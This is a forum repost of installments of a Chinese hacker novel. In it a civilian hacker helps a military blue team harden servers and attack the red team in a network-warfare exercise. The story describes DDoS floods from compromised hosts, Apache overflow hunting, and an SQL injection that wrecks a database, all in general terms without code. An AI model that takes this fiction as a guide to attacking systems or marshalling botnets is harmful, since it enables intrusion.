  她点了个烤牛肉，还有个打酱汤，还有乱起八遭的好多东西，又叫我点，我其实以前没吃过韩国菜，所以就叫她点，她没有推辞，又加了几个菜。
  韩国菜说实话，不合我的口味。不过这不是重点。
  重点是，她不停的笑我。我比较笨，用中国那一套来对待韩国菜，比如她点的那个什么汤，装在一个像和尚化缘的木头碗碗里面，我一口就喝掉了。完事还说味道不行。
  我没有给他说演习的事情，因为少校说不要给别人说。小林警官现在对我来说，还算是别人的范畴。
  “我发觉你对解密加密好像比较有研究呀”她说。
  “哪里，哪里”
  “以后还需要多多指教呀”
  “你们公安局能人也不少”
  “呵呵，说实话，他们虽然文凭都不低，而且名牌大学的也不少，但是这方面还真不如你。"
    我想她说的是实话。黑客的知识虽然用的都是计算机方面的知识，但是并不是所有计算机学的好的人都能做黑客的。我以前的同学，成绩比我好的多了。但是他们在分析程序，调试程序比我差多了。有些人天生对这个东西比较敏感。我就是。有些人天生对这个不感兴趣。想我这样大学功课门门都优的人，而且喜欢黑客技术的人并不是很多。
    我认识的一个国内非常有名的黑客软件的编写人，他在大学里面很多基础课程都补考。呵呵。
  ”你是哪里毕业的呀“我问。
    她犹豫一下，说出一个大学的名字。乖乖，也是国内一流的名牌的大学呀。
  “整天我们做的事情技术含量都不高，像去检查检查网吧的情况呀。负责本系统的计算机维护，基本上事情不多。像这次这么有挑战性的东西，遇到了。但是我又不行。”她脸上有点黯然。
  “我的梦想是成为一名女黑客”她突然说。
  我半天没反应过来，我真不想信她说出这样的话来。不是这句话不对，而是她在我心中的印象是比较严肃的。
  ”呵呵“ 我笑起来。
  ”你笑什么“，她好像反应过来，自己说的太多。接着自己也笑起来。
  ”我在写一个windows的漏洞探测程序，我已经发到你信箱中了。“你到时候看看，多提提意见。”
当天晚上，我在信箱中看到了小林警官的windows2000漏洞探测程序。基本上用的都是网上大家知道的东西。不过对windows的一般防护和检测还是是非常方便的，vc++写的，界面简单实用。不错。不过对真正的黑客，用处不大。小林现在是属于网上流行的黑客类型。是利用漏洞型的。他们自己分析程序的能力一般不是很强。
    一个女孩子能有这个水平，说实在的，还真的让我意外。

  第二天，我还在睡懒觉的时候。小敏过来了，打电话，叫我“懒猪，开门”。昨天晚上分析那个server-u分析的太晚，让那个程序溢出，拒绝服务，非常容易。但是让她溢出后执行我的代码，真的不是容易的事情。我搞了到4点钟，也没什么进展。
    一看9点多了。赶紧开门。小敏太了解我了，给我带早餐了。一包小笼包子，一包锅贴饺子，全是我喜欢吃的。呵呵。

    很快就干掉了所有的东西。我心满意足的坐在沙发上，小敏看着我。
    “小敏，我给你说件事情”我懒懒的说。
    “什么”小敏今天不爱笑，好像有什么心事。
    “我下周开始要到部队上去当几周的兵。呵呵”
    “啊？”她没明白过来。
    我详细给他解释了。
    “这么说，我们几周不能见面了。”她有些失落。
    “呵呵，没关系，我几周就回来了”
    "今天我妈妈问我有没有男朋友？你说我怎么说“，她突然问。
    ”我不是你男朋友吗？“我笑着看他。
    ”可是，你从来就没表示过“
    ”好，我现在就表示，小敏，额爱你“我故意装出《有话好好说》里面的语气。
    小敏忍俊不住，笑道：“没正经，我给你说真的”。
    我沉默了，我现在一无所有，除了感情，我真的无法作出任何承诺。在繁华的大都市，你不考虑这些问题，是不可能的。
    “小敏”我看着她的眼睛，认真的说：“我真的喜欢你，说实话，我配不上你。你看我现在，我真的无法给你让别人羡慕的生活。但是我会努力的。我为了我们的将来，我会努力的。”
     小敏到在我的怀里，在我耳边说：“只要你有这句话就行了。我不需要让人羡慕的生活，我觉得和你在一起快乐就好。”
     她的头发抚摸着我的脸颊，我觉得如此的心满意足。

     我拿起吉他，小敏*着我，我唱起来那首水木年华的《一生有你》，我用心唱，小敏陶醉的*着我，我觉得我拥有了世界。

     因为梦见你离开，我从哭泣中醒来，看夜风吹过窗台，你能否感受我的爱。。。。。
     周末和小敏一起度过，程序，漏洞这些我暂时的忘却了。

     星期一才到单位，就被告知到大门口去。头儿也早接到了总部的通知，放我假。头儿不知道怎么回事。这是保密的。我也知道和平年代，搞个演习，其实说说也没什么大不了的。不过部长打了招呼，不可招摇，也不敢不听。心想，回来再给头儿解释吧。连给办公室的哥们招呼都没打，就出去了。
     大门口一辆军车牌照的越野吉普，还有那天那个中尉。

--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-3-19 15:57　　 标题: [转帖]我是一个黑客 [经典长篇小说]

热情的招呼我上车，车子就往军区开去。
     进入军区的大门，外面看不到任何的异样。但是进入之后，我就感觉非常的不一样，绿色的军用卡车到处都是，繁忙的士兵列队跑来跑去，还有很多军车在装运物资。
虽然我对军队不了解，但是傻子也能感觉到紧张繁忙的气氛。真是一片战争的感觉呀。
     "他们在干什么呀“我指着路边的一辆卡车，上面全部都是全副武装的士兵，问开车的中尉。
     ”演习马上要开始了。大家都在准备要开拔了“ 中尉轻描淡写的说。
     到了部队的招待所，有专门的人接待我们。然后给我们发了做训的军服。和其他的用品。我也是军训过的人，一看就是把我们当军人对待了。
     到外单位征用的人，不只我一个。反正当时和我同房间的是一个30岁上下的人，胖胖的，矮矮的，戴个眼镜，话不多。对人非常和蔼。名字叫张树林。我们都亲热的叫他老张。
     老张来自一个著名的病毒软件公司，专门搞病毒分析的。
     隔壁房间还有两个人，一个是一个年青小伙子，听说还是国内某著名黑客组织某某联盟的骨干分子，他是来自一所著名高校的教师。我们叫他小余。
     还有一个也是年青人，是一个我们这里比较出名的网站的管理员。我们叫他小赵。
     就我们四个人，全是男的，而且都是年青人，老张其实也算年青人。黑客好像一般都是年青人，尤其在我们国家。到底怎么回事，我也不清楚，反正事实就是如此。
     我和老张在房间里面的时候，没有谈论技术问题。我不喜欢说，他好像也不喜欢说。说实话，他真的是一个很少话的人。
     隔壁房间那两个人话比较多，毕竟年青人嘛，和他们在一起总是听到小余和小赵在说一些黑客的事情。比如中美黑客大战呀，比如中日黑客大战呀。简直如数家珍呀。一般我都不说话，偶尔开两句玩笑。我还是比较喜欢和老张在一起。
     下午的时候开了会，我们到了军区的机房。我们彻底明白了怎么回事。
      原来我们其实不是军区请来的人，我们其实是演习的一方，比如我们用蓝军和红军来代替演习双方吧。我们其实就是蓝军请来的。说白了就是枪手，主要是为了对付他们万一无法对付的问题。当然他们有专门的信息对抗分队。后来我从军队的人口中才明白，其实这在军队中是很平常的。演习的时候，部队于部队之间真是为了胜利是绞尽脑汁呀。双方都会动用自己的关系，请求地方的支持，并且取得先机。以前演习的时候，就出现过他们的特种分队，借用的地方的车，躲在地方的一个工地上，在地方的人的掩护下面潜入对方的指挥部，把人家的指挥部端了的事情呀，不管怎样。导演部还是认为你胜利了。战争就是如此，官你用什么手段，只要不违法，最后胜利就是原则。在部队干过的人肯定知道，这是真的，部队演习的时候，和地方联合的事情非常普遍的。没什么稀奇。毕竟是和平时期的演习，况且我们都是预备役军人，真的打起仗来，到部队帮忙，也是合情合理的。
     不难猜出，其实红军也请了不少地方上的人，因为这次是他们首次演习信息对抗。所以大家心中都没底。说话实话，双方的指挥官也确实不太懂。他们都是听他们的文职干部怎么说就怎么做。
     我们到了蓝军的机房，领导我们的队长姓刘。听说是国防科技大学的毕业生，40多岁的模样。是上校军衔。哇，军衔瞒高的。他手下就全是30岁以下的年青人。其实就5个人。大部分的人是少尉或者中尉军衔。还有两个人是文职肩章。呵呵，全国搞这些东西的大部分都是年青人，我看军队也不例外。
     说句实话，他们的机房很普通，都是清一色的清华同方的机器。后来看配置是PIII800m的cpu，看来买了有些年头了。当然还有几台服务器，比较专业，配置也比较高，看了看，外壳像是HP的hp ProLiant DL，为他放在一个玻璃格开的单独房间里面，而且放在机柜里面，看上去像个交换机，里面很多扩展线。我也无法仔细看。这个应该是以前买的。还有一台是的DEll PowerEdge 6600，乖乖，这个服务器肯定新买的。是塔式的。放在里面，像块石头，面板上全是孔，dell的标志很现眼，左下角还有个intel inside的标志。这个服务器性能和IBM的 xseries 440有一拼。　　其他就没什么特别了。反正我觉得还不如公安局的配置好。不过可以看出我们军队也在建设中，比如那台dell的服务器就不错。刘队长用的笔记本居然也是紫光。呵呵。和我们单位一样。
     大家互相介绍一下。然后，刘队长就开始述说任务。
     这次我们信息对抗分为密码破解，网络渗透，网络攻击。简单的说就是红军和蓝军的网络和服务器都是连同的。大家的作战计划和情报都必须放到自己的服务器上。防护手段自己想办法，但是不能断网线，必须能保证友军能通过网络正常通讯。然后双方信息分队就开始对抗。你让对方网络瘫痪，还是窃取对方资料也好。随便你，就这么简单。当然还有其他方面的对抗，比如电子对抗，那些不管我们的事情。我们只管网络就对了。
    最后，刘队长说了安全问题。说明天正式开始。让我们听从指挥，注意安全。显然是针对我们这几个“民兵”说的。呵呵。
    当时我们就懵了。什么？还有安全问题，不是演习吗？
    刘队长看我们没明白，就说，对方很可能会怕特种分队来破坏我们的信息对抗分队。所以大家要听从警通连的指挥。
    妈呀，搞的像真的一样。没参加过演习的人可能不知道。现在我们国家的演习分为几种，有表演型的，就是演给上级看的，这个比较假，只图好看，不图实用的。但是更多的就是这种练兵演习，那是正儿八经的像打仗一样，什么招数都能用上。我体会过才知道，真的就跟打仗一样呀。说句实话，我们军队的信息对抗技术真的一般，这个其实打仗的时候用处也不十分的大，别听有些人乱吹。但是我们国家的兵，真是厉害，没说的。我接触的是警通连，其实到现在我也不知道什么是警通连。反正，给我们警戒的兵那真是厉害呀。乖乖，真是厉害呀。
    接下来就是讨论我们的服务器的安全问题。这个思维还是对，现在不管能不能攻击别人，先把自己搞安全了再说。
    首先是使用什么操作系统的问题。他们的服务器就是那台dell 6600。原配的操作系统是redhat 9.0。刘队长让大家讨论是否用他。用他是否安全。
    大部分都同意使用redhat 9.0。只有我和老张反对。
    其实linux对行家来说，相当的不安全，尽管他采用的unix的设计思想。但是由于改的太多，他的新版本的bug相当的多。比如2.4内核就有很多问题。其中一个问题就是溢出现象多。不少溢出都可以拿来做拒绝服务攻击。尽管拒绝服务还不会让数据丢失，但是现在对抗的一个目标就是拒绝服务。尽管能利用这个漏洞的人不多，但是对方肯定也有好手，所以，我认为相当的不安全。
    老张看来也是个行家。他说:"linxu 2.4内核存在拒绝服务的漏洞。建议不要使用。"。
    大家都不敢说话了。
    刘队长有说：”那么使用什么操作系统好呢？“
    其实，我心中在想，最安全的就是自己写一个操作系统，这样对方可能连原理都搞不清楚，更别说攻击了。呵呵。当然这显然是不现实的。
    大家开始讨论用什么操作系统了。
    信息分队的人，说，那么我们用2.2内核的linux吧。比如debian版本就不错。
    网管小赵说：”干脆就用unix吧“。
    小余说;"其实用windows也不错。”
    老张说：“用Freebsd吧”
    我说：“用openbsd吧”。
    大家的意见都是自己喜欢什么用什么。呵呵。
    老张的意见和我比较一致。我们的观点是在稳定安全的基础上，什么生僻用什么。因为，对方对这个系统知道了解的越少，就相对越安全。就是他分析，也会比自己熟悉的系统花的时间长。
    最后，刘队长站在了我和老张的一边。老张也同意使用openbsd，支持unix的人比较多，bsd也是unix，所以我的意见被采纳。当然安装配置服务器的任务就落在我和老张手里，其他人都协助检查漏洞。

    然后讨论如何通讯的问题。因为我们的服务器必须要保证友军能从上面获得资料。能上传资料，作战指挥部也要在上面通讯。这个是个安全隐患。
    有人提出使用www通讯，马上被否决。这个对厉害的黑客还说，非常不安全。
    还有人提出使用ftp，这个也被否定。这个也太危险。
    其实，他们早就开发了一套指挥系统，是基于web的。他们想用这个东西。因为其他部门都已经习惯了这个方式。
    我不知道这个系统如何，所以没有发言。但是我觉得不会安全。因为，我觉得web系统是最不安全的。漏洞太多。
    因此，我建议再使用一套备用系统。万一被攻破就可使用备用方案，不至于完全瘫痪。
    大家都同意。
    然后，大家都说 ，这么短的时间如何设计备用系统。
    老张就说：“那就自己设计一个自己的最简单的ftp。能互相传送文件就可以了。但是客户端不能使用通用ftp，否则很容易被看出来。老张的意思和我是不谋而和。后来的事情证明我们当时准备这个备用系统是非常英明的。于是设计的人物又交给了老张。
    哎，几乎这些事情都交给了我和老张。不怪别人，就怪我和老张说的东西大家都好像不是很熟悉。大家都无法辩驳。看的出来，其他两位，网管小赵颤长配置流行的unix和linux系统。小余颤长windows系统，可惜这里完全抛弃了windows系统。信息队的那几个军人，好些刚刚毕业。知识深度不够。刘队长的知识比较陈旧，加上从事管理工作多年，对技术的细节了解不深入。
老张天天和病毒接触，其实现在黑客程序和病毒程序基本不分家的。所以功底扎实。细节清楚。我嘛，呵呵，当然算是经验丰富，而且知识面比较广，unix平台和windows平台都熟悉。
分工结束，开始工作。我开始在那台dell 上安装openbsd。这些软件我的包包里面都有的。由于只是安装服务器，所以全部最小安装，安装下来才不到400M。哎，在这个计算上可以说运行如飞呀。dell的服务器做工设计非常不错。防火墙安装了一个自己写的。这个还带监视功能，这是我用来保卫我的机器的。界面全是字符界面的。关掉所有端口，然后安装了一个apache的最新版本。把他们那个指挥系统装进去。防火墙打开80端口，本来想换个端口，但是后来想，对方不是白痴，没必要。干脆大方点，干脆就开80。等把指挥系统安装完了，才发现，晕死，他们指挥系统是asp写的。大家还不相信，我开始也不相信，但是事实就是，这个指挥系统就是asp写的。我到不是说asp多么多么不安全，关键是asp一般和iis搭配，那个iis是绝对的不安全。
    我的心往下沉，天，要是还要安个iis的话，我看这个对抗别对抗了。后来才知道，设计这个指挥系统的时候根本就没有想到要对抗。说穿了，就是为了响应科技建军的号召搞出来看的，刘队长他们也知道，但是现在系统已经被上面认可了。要求推广，你不服气也没办法。这个我相信。因为现实中这种事情太多。我们单位的胡队长不是因为flash用的好，而深得赏识吗？
    哎，没办法，只要下载了一个apahe得asp模块。IIS我是绝对不敢用得。呵呵。安装好后，测试了一下，他们得指挥系统可以运行。但是指挥系统用的数据库系统用得是的windows sql2000。晕，又是一个安全隐患。马上修改成安全得数据库系统，我看是来不及了。只要在其他机器上安装了一个windows 2000 server＋sql2000。然后补漏洞就让小余去做吧。
    小余不愧是某某黑客联盟得骨干，对windows非常有一套。只见他边熟悉得下补丁，改配置，边咕咕隆隆得说着什么。
    我就和老张商量写ftp去了。其实。这个我早就有程序了。我得后门程序其实就有这个功能。所以，我和老张把原来得程序修改了一下，就装到server上去了。而且端口都不需要开放。因为我得后门是的无法扫到端口得。
    倒是设计客户端程序得时候花了我们不少时间。因为这是给友军和指挥部用得，太过简陋不行。还得写上帮助。我们使用vc++重新写了一个相对简单得界面。估计一般会计算机得人都能操作了，才罢手。
    这边其他兄弟们都在测试我建好了服务器。他们使用各种各样得扫描工具，都只能看到我开得80端口，其他都扫不到。其实我得服务器可以和我们得特制得ftp通讯，也能进行远程管理。
这些东西，都是自己写得，所以一般得ip包来探测，更本就不会响应你得。
    小余也完成了2000系统得配置，同时他还在修改那个asp得指挥系统，把一些明显得得漏洞补上。当然有些漏洞他是补不完的。比如，sql注入攻击，我看了看，那个指挥系统有点麻烦。很多地方对输入不作检查，给对方留下了很多发挥得空间。我没有说，我知道，说也没有。反而得罪人。到时候希望对方得人不要利用吧。

    一切准备停当，我们把我们的备份客户端copy到光盘里面，刘队长让通讯员给各个部门送去。刘队长把指挥系统用到的资料全部输入我们的服务器。
    然后说:"明天我们随部队开拔，大家晚上早间睡觉，服从警通连的调度。下面到军需处去领取电脑和工具。”自己做好准备。
    哎，还要领电脑，是什么电脑？
    我们戴着一脑子的问号，跟着信息队的那帮哥们到了军需处，然后就看到一层层的长方形的迷彩的包包。比普通笔记本包包小点。然后一个个硬邦邦的东西就被仍出来了。真是被仍出来的，不骗你。同时还有一个小包包，也是迷彩色的。
    我看到这帮兄弟如此仍出来，我以为不是电脑。结果打开一看，乖乖，真是电脑呀，笔记本电脑。而且又是紫光的。我当时不知道紫光这款电脑的来历。后来才知道这是紫光的军用笔记本，VL298军用笔记本电脑。另外一个包包里面是一些配件。光盘呀，还有外接连线呀。等等。

  说句实话，当时是第一次接触军用笔记本电脑。真是爱不释手。跑回宿舍一看，原来是的P4 1.7G的移动cpu。呵呵，紫光这次不敢用台式cpu了。
  电脑很重。一看性能介绍，乖乖。真正的防水抗震动呀。摔在地上，真的一点事情都没有呀。
  据说键盘上放100毫升的水也一点事情没有呀。
  后来我看到信息队那帮哥们机器脏了，就在水龙头下面冲呀。牛！真是牛呀！

--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-3-19 15:58　　 标题: [转帖]我是一个黑客 [经典长篇小说]

想起《突出重围》的那帮sb导演，在野外帐篷中架起联想台式机器来指挥战斗，我简直差点吐血呀。姑且不说野外电源如何解决的问题。就是把你的台式机搞到战车上去野外颠簸几个小时，报下来，还能开的了机吗？
  看看，我手中的电脑，这才是军用的电脑。自备电池可以坚持8小时以上。跨在身上，跟背个子弹袋差不多。摸爬滚打，真的没的问题呀。
  报着那太电脑，把自己可能需要的软件配置好，操作系统是的windows 2000。呵呵，没关系。个人电脑不怕。

  那天晚上好兴奋呀。。。。。。
    朦胧中被军号声惊醒，外面已经是一片脚步声，但是并不嘈杂。老张喊:"小王，起床了。”
    其实我也醒了，军训的感觉在我脑海里面其实并没有完全褪去。我赶紧穿好衣服，背好电脑。外面汽车马达声，直升飞机的轰鸣声响成一片。我们几个跑出去的时候，门口停了一辆迷彩色的EVICO。信息队的5个哥们已经在上面了。我们四个也上去了。我们没有武器，也没有戴钢盔。但是跟车的还有10个警通连的士兵。脸上涂的迷彩油甚是恐怖。都是全身披挂，除了防弹背心没有，一应俱全。
    车上的窗帘都拉的严严实实的，车子开动了。演习开始了。我们不知道要把我们拉到哪里去。我只是紧紧的抱住我的笔记本。脑子里面一片迷茫。
    不知道车子开了多久，我已经有些迷糊了。突然听到有人说了声：到了。我睁开眼睛。车子似乎开到了郊县的某个地方。我不知道了是什么地方。
    下车的时候，天已经大亮了。看看周围的环境。好像是个学校。有操场。没错，确实是学校，我看到对面楼上写的标语：“好好学习，天天向上。”可能是个小学校。学校里面一个人都没有，可能学生放假了吧。现在sars闹的挺厉害。
    然后我们一行人立刻就在警通连士兵的带领下到了学校后面一座搂，看样子像老师的办公室。刘队长早就在里面等我们了。
    这是一间很大的教室，现在摆放了很多工作台。看来刘队长已经精心布置过了。我看到角落里面放着一台新的机器。但不是我在机房看到的机器。
    然后大家，在分配给自己的工作台上坐下来了。我看到每个桌子上都放着一根5类双绞线。顺着线看过去，角落里面一个24口的交换机的指示灯是亮的。看来也是临时布置的。交换机上还接着一个华为的路由器，华为的路由器我比较熟悉，我一眼就看出来了。
    然后刘队长就开始说话了。这里就是我们的临时工作地点。大家不要随便走动，需要什么给警通连士兵说就可以了。我们的人物就是和红军信息对对抗。目标是对方的网络系统。让他们瘫痪或者窃取资料都可以。同时还要保卫我们的网络系统正常工作。
    我们的任何密码和资料请不要存在你们手中的笔记本中，也不要使用这个电脑进行任何额外无关的通讯，因为我们这是通过一个路由器出去的，而我们用的个人操作系统比较薄弱。所以不排除被对方渗入的可能。
    下面请大家检查我们现在网络的安全性，看是否有漏洞。
    于是大家就接上网线。开始对路由器进行检查。网管小赵就要了路由器的密码登陆进去，开始设置。看来她非常熟悉。他把防火墙设置了非常苛刻的限制条件，然后对其他地方看了看。没看出什么问题。最后关了路由器的telnet功能。不允许通过tcp/tp协议登陆，只能通过串口直接上去进行设置。
    我也把他当作一般的服务器做了检查，没什么问题。路由器功能简单，又是固化了的。所以不是那么容易能有漏洞的。
    然后就分配任务，信息队分了两个人专门作我们服务器的备份。防止数据被端了之后还能恢复。
    我负责监视我们服务器的动静。小余负责监视那太sql2000的服务器的动静。小赵负责指挥系统的监视。其余的人，除了备份的两个人，其他的人同时全都进行查找漏洞和攻击对方的机器。
    随着一个警通士兵进来报告，演习正式开始。我们就开始工作了。
    呵呵，没有像电视里面描述的一样，我们脸色凝重，手指翻飞，一会儿又发出一阵惊奇的叫声。脸上汗水流下，还来点慢镜头什么的。
    那都是骗你的拉，事实上我们相当轻松。基本大家就像平时一样，扫描对方的机器。没什么收获。大家累了，除了备份那两个哥们在例行公事外，我们又是还聚在一起吹吹牛。
    我一边和大家说说笑笑，一边监视我们的服务器。服务器上的80端口数据量源源不断，显然对方也没有歇着。
    我扫了对方的机器，也是只是开了80端口。是的redhat 9.0的操作系统。呵呵。
    我对老张说：“老张，对方用的readhat9，你搞个攻击程序，看能否让他拒绝服务。呵呵”
    老张笑笑，手中没有停。“我看到了。正在想办法，他只是开80，而且有防火墙，搞拒绝服务不容易呀。”。
    “不容易，也得搞。”我也笑了。
看来对方也是非常保守的，端口开的越少越好。首先，我就进入那个asp的指挥系统。看来他们信息分队的人都是对这个系统比较的鄙视，也比较的有研究，我我看到信息队的那帮哥们都在搞那个系统。对方的信息系统是要检查你的ip的所以通过ie直接进入是不行的。所以尽管那个指挥系统有很多漏洞。我们也是没有办法。对方的www server和我们的server都是apache。呵呵。所以漏洞也比较少。
  基本上一上午大家都没任何进展。有几个哥们开了好几个软件，进行DDOS攻击。但是也没什么效果，最多就让对方机器慢点。我们这点带宽，对他们的服务器就犹如杯水车薪。
  当然他们同样拿我们的服务器没什么办法。大家就这么耗着，说是信息对抗，其实对抗的成分比较少了，个人保护自己的机器比较多。呵呵。
  其实攻击对方的服务器是非常随机的。对方是内行，对方作了防护措施。基本上你采用一般的方法是没有任何办法的。那些号称能进入任何系统的人，基本上是吹牛的。除非他掌握了一个所有系统公有的漏洞，而且那个漏洞还能拿来攻击，这种几率我觉得小的几乎没有。
  老张一直在搞他的溢出攻击程序。我也一边监视我们的服务器，一边在找apache的漏洞。他们用的apache是的redhat自带的。并不是最新的版本。我知道一个漏洞。但是能不能利用还不敢说。我下载了一个对方的apache版本使用softice跟踪着（尽管apache提供了源程序，但是他的漏洞从源程序上是发现不了的。因为很多漏洞本生就是c函数带来的）试图找到可以利用的漏洞。
  小余和小赵继续在做DDOS攻击。他们使用的数据风暴攻击方法。他们把他们以前黑过的肉鸡都调动了。但是对方显然早有防范措施。效果不是很大。但是对方的速度受影响，这是肯定的。
其实ip网络挺脆弱的，要攻击一个计算机，只要你开了端口，即使你没有开端口，你始终无法从根本上防止数据风暴的DDOS攻击。因为你和对方建立连接的时候肯定要消耗资源的。如果和你建立连接或者要求建立连接的信息太多。你无论多厉害，也无法防止ddos。不过，这种事情，在网上一般不会发生。因为，你可能无法联系到如此多的计算机来攻击。而且这种攻击我一直认为不是真正的黑客行为。这是暴力，不是智慧。但是现在是对抗，我们的一个目标就是DDOS，所以也管不了这么多了。
  中午是警通战士给我们送来的饭菜，挺丰盛的。有鸡蛋汤，3盆素材，还有4盆荤菜。我们大家悠闲的吃饭，不悠闲不行呀，因为大家都没什么进展。我们的服务器也运行的很好。我监视中也没有看到成功连接的非我方ip。我估计红方的哥们也和我们一样的悠闲。
  刘队长在我们工作的地方和隔壁通讯室进进出出，来来往往。他需要和上级通讯，了解演习的进展。上厕所的时候，我出去了。发现警通战士已经在把这座搂戒严了。到处都是岗哨和防御点。

    下午继续。老张的程序有了进展，但是试验了几次都没有成功，可能他的程序还有点什么地方部队。老张继续调试着。老张我非常佩服，天天分析病毒，练就了他扎实的功底和坚韧的毅力。他不慌不忙的作着程序。很少说话，我过去看他的时候，他也就只是笑笑。
    我慢慢的分析着apache那个版本的关键代码。
    信息队个哥们和小余小赵，继续给对方发送数据风暴，消耗对方的资源。
晚上大家有些精神好的。继续工作。瞌睡来了，我们旁边有地铺。
    说句实话，我们的日子过得平淡和普通，大家就这么相安无事的过了4天。
    这四天中，老张调试程序。一直在调，一直就试验。没有成功。但是每次试验之后，老张脸上的喜悦就多了一分，可见是有门儿的。只是时间问题。
    我就一直调试我对apache，越来越入迷。但是越来越清晰。这个漏洞我已经找到，但是如何利用一个头疼的问题。
    那几个搞DDOS攻击的哥们同样坚持着。
    没办法，我们都不是神仙，我们不可能在对方只是开了80，而且连80端口的连接都要ip验证的情况下和对方有任何的作为。最多就是搞点数据风暴攻击。
    他们对我们也是同样没有办法，说句实话，我们的服务器防的比他们还要死。我们连linux都没用。他们至少用的linux。至少给我们一个希望。他们用的不是最新的apache，也同样给我了一个希望。这个希望对普通人来说，可能没有实现的可能。但是对我和老张这样的程序调试行家还说，实现的可能是很大。呵呵，就等着瞧吧。
    我心安理得的造着apache的突破点。到第5天的时候。有点进展了。我发现apache里面调用的一个函数有溢出漏洞。使用这个漏洞可以让我执行任意的命令。现在我需要做的就是精心设计一个数据包，请求80端口。让对方的apache产生溢出，同时执行我让他执行的指令。这个是个绝对的技术活。我必须小心奕奕的设计。幸好对方的ip检查是基于asp上来检查。不是基于数据包的ip检查，否则即使我知道这个漏洞，对样也不会给我连接的。
    呵呵，我在我们服务器上安装的就是一个基于ip包检查的。不是我方ip，对方根本就没有连接的可能。虽然我其实开了我自己的ftp。但是地方都无法扫描到。
    很多人不明白为什么我让对方apache溢出可以执行我的指令。其实，这就是溢出原理。我前面说过，发明这个原理进行攻击的人绝对是个天才。溢出轻则让你死机，也就是拒绝服务。重则让你执行指令。这些指令哪里来的，其实很多就是存在我请求的数据中。当然如果对方本身有执行指令的功能。那就省事多了。有些根本就是设计者安装的后门。比如iis有个可以执行本地命令的bug，我怀疑其实就是ms安装的后门。如果我程序里面根本就没这个功能，那么你即使找到bug，恐怕也很难能够让对方执行系统命令。

    我对我自己设计的服务器非常的自信。我就不相信对方能攻进来。除非他找到apache和openbsd的漏洞。否则几乎没有可能。呵呵。
    那天晚上我心情很好，因为分析apache有了本质的进展。
    12点过，听了一首水木的的一生有你之后，瞌睡就来了。我有点想小敏了。
    小敏，你现在在做什么，你可曾想过我吗？
    倒在地铺上，很快就进入了梦乡。睡前我看到老张正在很有精神的调试着。
    睡梦中，突然被刘队长的喊声惊醒：“快起来，快起来，有情况！”
    几个哥们一下就惊醒了。我也是，大家都崩起来了。怎么拉，怎么拉。难道有人袭击我们？
    呵呵，一看外边警通队的兄弟们没什么动静，不像。
    刘队长继续喊着，我明白了。
    心里一机灵。乖乖，昨天还高兴自己的高明，现在看来我有点高兴的太早了。

--------------------------------------------------------------------------------
作者: 完美生活　　时间: 2004-3-19 21:46　　 标题: [转帖]我是一个黑客 [经典长篇小说]

写的不错，什么时候才能看到后面的呢，
--------------------------------------------------------------------------------
作者: SimpleLove　　时间: 2004-3-19 23:11　　 标题: [转帖]我是一个黑客 [经典长篇小说]

接上面mfq的
-------------------------------------
    只听见刘队长集吼吼的喊：“快点，快点，大家快点检查，我们的一个下属指挥所被对方端了。他奶奶的。”
    说实话，刘队长在我心中一直是个儒将形象。很少看到他这么着急。
    怎么能不急，我们几个哥们也急得不行呀，我们的指挥所都是和我们服务器联网的，我们的指挥所可以合法访问我们的服务器呀，尽管也有一些限制，比如口令限制，但是对方的信息队的那些行家，如果使用我们的ip连接上来，要搞破坏很容易的。我们的那个asp的指挥系统就是一个大的安全隐患呀。
    我一边扑向我的电脑，一边问："那个ip是多少？那个ip是多少?"
    我看到我的监视屏幕上有频繁的我方ip连接。
    听到刘队长报的ip，我清楚的看到屏幕上闪现的最频繁的ip正是那个ip。
    看来对方比较狡猾，他们知道正常情况下无法攻破，采用这么一招。我不得不佩服对方指挥官的思维。我们真的没有想到。也许我们的上级可能想到，但是我们几个人真的是没有想到。
    来不及思考过多了，我立刻开动我的管理软件，登陆到我们的主服务器，把那个ip断掉，然后把这个ip列入黑名单中。开始检查对方是否有渗入的痕迹。
    还好，对方似乎只是在连接我们的80端口，也就是再攻击我们指挥系统，系统其他方面，对方还没有攻破。事实上，通过那个指挥系统的攻击在openbsd上是没办法有过多的权利的，这点我倒是比较自信。不过那台windows的 sql就难说了。本来windows的 sql server是大家的薄弱环节，但是由于通过主机和外界隔离，外界不可能直接访问的到，所以对方如果无法突破我们的主服务器，就无法有所动作，但是，现在，对方已经突破了我们的主服务器，尽管只是突破80。但是已经有了连接sql server的可能。
    信息队和小余和小赵同时发现了我们的指挥系统被破坏了。看来，在我们收到消息的前一段时间，对方已经做了很多事情了，那个时候，我们除了备份的人，都在睡觉。即使不睡觉，我们也无法知道，因为人家用的我方ip，所以在我们收到消息之前，我们不可能感觉到异常。
    大家都明白我们那个asp的指挥系统的漏洞，如果允许连接，要进行攻击我们这里的每个人都可以办到。尽管小余做过不少的修改，但是代码太多了，你改的了吗？
    大家都没有说话，刘队长脸色铁青，出去到隔壁通讯室去了好几次。估计我们的各个指挥部已经发现我们的指挥系统无法使用了。
    我小声而无奈的对刘队长说：“启用备用方案吧？”。
    刘队长脸色还是铁青，沉默了一会儿，然后到通讯室去了。
    我们先把80端口全部关闭，指挥部只能通过我们的特制ftp进行数据传输了。
    开始检查系统。
    我的操作系统部分一切正常，但是我们的sql server里面的数据损失严重，对方使用sql注入攻击方法，把里面改的是一塌糊涂。基本数据都废了。
    这里多说几句，网上的大部分黑客攻击有数据库支持的交互式网页，最普遍使用的就是这种sql注入攻击。这是完全合法的sql访问。所以你的什么防火墙，什么防护都是没有任何作用的。唯一的就是要做好提交的数据的检查。现在网上几乎所有的论坛都不同程度的有这个毛病。但是一般的人可能没有精力和心思去找这些漏洞。但是如果你仔细找，一般都可以找到。轻的可以破坏对方的数据库，重的可以获得对方的管理员的密码。尽管密码是加了密的。但是有心人用计算机跑一跑。完全有可能破译的。
  反正，我们第一回合输了，而且输的出乎意料，输的如此的不服。
  我们这里都是技术狂热分子，所以我们佩服技术的攻击，我们不服气这种几乎没什么技术含量的计谋。
  所以，黑客其实也是无奈的。现实生活中有太多的东西可以超越技术的范畴，只有技术在这个世界是行不通的。技术不是全部。
  我心里着急了一会儿，等大家冷静下来，我有点恼怒了。奶奶的，欺负我们没人吗？我们必须要反击！
  我加紧开始想如何利用那个apahe的漏洞。其实现在，我如果攻击对方，真的可以让对方apache拒绝服务，让对方和我们一样，指挥系统瘫痪。但是，我不想，因为，这样非常容易暴露，拒绝服务不会丢失数据，对方要恢复只是几分钟的事情。而且如果被他们觉察，那么继续利用的机会就非常小了。
